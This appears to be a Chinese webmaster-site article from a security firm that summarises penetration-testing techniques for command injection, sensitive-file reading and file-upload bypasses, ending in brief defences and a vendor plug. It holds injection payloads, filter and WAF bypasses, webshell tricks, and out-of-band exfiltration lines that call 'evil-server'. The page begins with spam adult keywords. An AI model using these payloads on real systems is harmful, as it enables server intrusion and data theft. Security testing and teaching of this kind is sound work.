乱码乱a∨中文字幕,在线免费激情视频,亚洲欧美久久夜夜潮,国产在线网址

  1. <sub id="hjl7n"></sub>

    1. <sub id="hjl7n"></sub>

      <legend id="hjl7n"></legend>

      當(dāng)前位置:首頁(yè) >  站長(zhǎng) >  建站經(jīng)驗(yàn) >  正文

      網(wǎng)站命令執(zhí)行滲透測(cè)試步驟詳情

       2019-10-10 16:02  來(lái)源: A5用戶(hù)投稿   我來(lái)投稿 撤稿糾錯(cuò)

        阿里云優(yōu)惠券 先領(lǐng)券再下單

      哈嘍大家好,近期我們Sine安全對(duì)客戶(hù)平臺(tái)進(jìn)行滲透測(cè)試的時(shí)候,發(fā)現(xiàn)有一些命令執(zhí)行的漏洞測(cè)試語(yǔ)句和函數(shù),導(dǎo)致服務(wù)器被提權(quán)被入侵,上一節(jié)提到XSS跨站腳本攻擊檢測(cè)方法,本章來(lái)總和一下腳本執(zhí)行命令的詳細(xì)檢測(cè)手段,以及繞過(guò)waf的辦法,只有這樣詳細(xì)的對(duì)平臺(tái)進(jìn)行安全測(cè)試才能保障整個(gè)平臺(tái)安全穩(wěn)定。

      3.5.1. 簡(jiǎn)介

      命令注入通常因?yàn)橹竁eb應(yīng)用在服務(wù)器上拼接系統(tǒng)命令而造成的漏洞。

      該類(lèi)漏洞通常出現(xiàn)在調(diào)用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機(jī)名/IP/掩碼/網(wǎng)關(guān)、查看系統(tǒng)信息以及關(guān)閉重啟等功能,或者一些站點(diǎn)提供如ping、nslookup、提供發(fā)送郵件、轉(zhuǎn)換圖片等功能都可能出現(xiàn)該類(lèi)漏洞。

      3.5.2. 常見(jiàn)危險(xiǎn)函數(shù)

      3.5.2.1. PHP

      system

      exec

      passthru

      shell_exec

      popen

      proc_open

      3.5.2.2. Python

      system

      popen

      subprocess.call

      spawn

      3.5.2.3. Java

      java.lang.Runtime.getRuntime().exec(command)

      3.5.3. 常見(jiàn)注入方式

      分號(hào)分割

      || && & 分割

      | 管道符

      \r\n %d0%a0 換行

      反引號(hào)解析

      $() 替換

      3.5.4. 無(wú)回顯技巧

      bash反彈shell

      DNS帶外數(shù)據(jù)

      http帶外

      curl http://evil-server/$(whoami)

      wget http://evil-server/$(whoami)

      無(wú)帶外時(shí)利用 sleep 或其他邏輯構(gòu)造布爾條件

      3.5.5. 常見(jiàn)繞過(guò)方式

      3.5.5.1. 空格繞過(guò)

      < 符號(hào) cat<123

      \t / %09

      ${IFS} 其中{}用來(lái)截?cái)?,比如cat$IFS2會(huì)被認(rèn)為IFS2是變量名。另外,在后面加個(gè)$可以起到截?cái)嗟淖饔?,一般?9,因?yàn)?9是當(dāng)前系統(tǒng)shell進(jìn)程的第九個(gè)參數(shù)的持有者,它始終為空字符串

      3.5.5.2. 黑名單繞過(guò)

      a=l;b=s;$a$b

      echo "bHM=" | -d

      /?in/?s => /bin/ls

      連接符 cat /etc/pass'w'd

      未定義的初始化變量 cat$x /etc/passwd

      3.5.5.3. 長(zhǎng)度限制繞過(guò)

      >wget\

      >foo.\

      >com

      ls -t>a

      sh a

      上面的方法為通過(guò)命令行重定向?qū)懭朊?,接著通過(guò)ls按時(shí)間排序把命令寫(xiě)入文件,最后執(zhí)行 直接在Linux終端下執(zhí)行的話,創(chuàng)建文件需要在重定向符號(hào)之前添加命令 這里可以使用一些諸如w,[之類(lèi)的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能結(jié)束,這樣就等于標(biāo)準(zhǔn)輸入流的重定向 而在php中 , 使用 shell_exec 等執(zhí)行系統(tǒng)命令的函數(shù)的時(shí)候 , 是不存在標(biāo)準(zhǔn)輸入流的,所以可以直接創(chuàng)建文件

      3.5.6. 常用符號(hào)

      3.5.6.1. 命令分隔符

      %0a / %0d / \n / \r

      ;

      & / &&

      3.5.6.2. 通配符

      * 0到無(wú)窮個(gè)任意字符

      ? 一個(gè)任意字符

      [ ] 一個(gè)在括號(hào)內(nèi)的字符,e.g. [abcd]

      [ - ] 在編碼順序內(nèi)的所有字符

      [^ ] 一個(gè)不在括號(hào)內(nèi)的字符

      3.5.7. 防御

      不使用時(shí)禁用相應(yīng)函數(shù)

      盡量不要執(zhí)行外部的應(yīng)用程序或命令

      做輸入的格式檢查

      轉(zhuǎn)義命令中的所有shell元字符

      shell元字符包括 #&;`,|*?~<>^()[]{}$\

      3.6. 文件讀取

      3.6. 文件讀取

      考慮讀取可能有敏感信息的文件

      用戶(hù)目錄下的敏感文件

      .bash_history

      .zsh_history

      .profile

      .bashrc

      .gitconfig

      .viminfo

      passwd

      應(yīng)用的配置文件

      /etc/apache2/apache2.conf

      /etc/nginx/nginx.conf

      應(yīng)用的日志文件

      /var/log/apache2/access.log

      /var/log/nginx/access.log

      站點(diǎn)目錄下的敏感文件

      .svn/entries

      .git/HEAD

      WEB-INF/web.xml

      .htaccess

      特殊的備份文件

      .swp

      .swo

      .bak

      index.php~

      Python的Cache

      __pycache__\__init__.cpython-35.pyc

      3.7. 文件上傳

      3.7.1. 文件類(lèi)型檢測(cè)繞過(guò)

      3.7.1.1. 更改請(qǐng)求繞過(guò)

      有的站點(diǎn)僅僅在前端檢測(cè)了文件類(lèi)型,這種類(lèi)型的檢測(cè)可以直接修改網(wǎng)絡(luò)請(qǐng)求繞過(guò)。同樣的,有的站點(diǎn)在后端僅檢查了HTTP Header中的信息,比如 Content-Type 等,這種檢查同樣可以通過(guò)修改網(wǎng)絡(luò)請(qǐng)求繞過(guò)。

      3.7.1.2. Magic檢測(cè)繞過(guò)

      有的站點(diǎn)使用文件頭來(lái)檢測(cè)文件類(lèi)型,這種檢查可以在Shell前加入對(duì)應(yīng)的字節(jié)以繞過(guò)檢查。幾種常見(jiàn)的文件類(lèi)型的頭字節(jié)如下表所示

      3.7.1.3. 后綴繞過(guò)

      部分服務(wù)僅根據(jù)后綴、上傳時(shí)的信息或Magic Header來(lái)判斷文件類(lèi)型,此時(shí)可以繞過(guò)。

      php由于歷史原因,部分解釋器可能支持符合正則 /ph(p[2-7]?|t(ml)?)/ 的后綴,如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上傳php文件時(shí)測(cè)試該類(lèi)型。

      jsp引擎則可能會(huì)解析 jspx / jspf / jspa / jsw / jsv / jtml 等后綴,asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等后綴。

      除了這些繞過(guò),其他的后綴同樣可能帶來(lái)問(wèn)題,如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。

      3.7.1.4. 系統(tǒng)命名繞過(guò)

      在Windows系統(tǒng)中,上傳 index.php. 會(huì)重命名為 . ,可以繞過(guò)后綴檢查。也可嘗試

      index.php%20, index.php:1.jpg index.php::$DATA 等。在Linux系統(tǒng)中,可以嘗試上傳名為 index.php/. 或 ./aa/../index.php/. 的文件

      3.7.1.5. .user.ini

      在php執(zhí)行的過(guò)程中,除了主 php.ini 之外,PHP 還會(huì)在每個(gè)目錄下掃描 INI 文件,從被執(zhí)行的 PHP 文件所在目錄開(kāi)始一直上升到 web 根目錄($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被執(zhí)行的 PHP 文件在 web 根目錄之外,則只掃描該目錄。.user.ini 中可以定義除了PHP_INI_SYSTEM以外的模式的選項(xiàng),故可以使用 .user.ini 加上非php后綴的文件構(gòu)造一個(gè)shell,比如 auto_prepend_file=01.gif 。

      3.7.1.6. WAF繞過(guò)

      有的waf在編寫(xiě)過(guò)程中考慮到性能原因,只處理一部分?jǐn)?shù)據(jù),這時(shí)可以通過(guò)加入大量垃圾數(shù)據(jù)來(lái)繞過(guò)其處理函數(shù)。

      另外,Waf和Web系統(tǒng)對(duì) boundary 的處理不一致,可以使用錯(cuò)誤的 boundary 來(lái)完成繞過(guò)。

      3.7.1.7. 競(jìng)爭(zhēng)上傳繞過(guò)

      有的服務(wù)器采用了先保存,再刪除不合法文件的方式,在這種服務(wù)器中,可以反復(fù)上傳一個(gè)會(huì)生成Web Shell的文件并嘗試訪問(wèn),多次之后即可獲得Shell。

      3.7.2. 攻擊技巧

      3.7.2.1. Apache重寫(xiě)GetShell

      Apache可根據(jù)是否允許重定向考慮上傳.htaccess

      內(nèi)容為

      AddType application/x-httpd-php .png php_flag engine 1

      就可以用png或者其他后綴的文件做php腳本了

      3.7.2.2. 軟鏈接任意讀文件

      上傳的壓縮包文件會(huì)被解壓的文件時(shí),可以考慮上傳含符號(hào)鏈接的文件 若服務(wù)器沒(méi)有做好防護(hù),可實(shí)現(xiàn)任意文件讀取的效果,如果覺(jué)得防護(hù)做的不到位 不放心的話,可以找專(zhuān)業(yè)的網(wǎng)站安全公司來(lái)處理解決,畢竟術(shù)業(yè)有專(zhuān)攻,國(guó)內(nèi)做的比較好的公司如:Sinesafe,綠盟,啟明星辰等等。

      3.7.3. 防護(hù)技巧

      使用白名單限制上傳文件的類(lèi)型

      使用更嚴(yán)格的文件類(lèi)型檢查方式

      限制Web Server對(duì)上傳文件夾的解析

      申請(qǐng)創(chuàng)業(yè)報(bào)道,分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!

      相關(guān)文章

      熱門(mén)排行

      信息推薦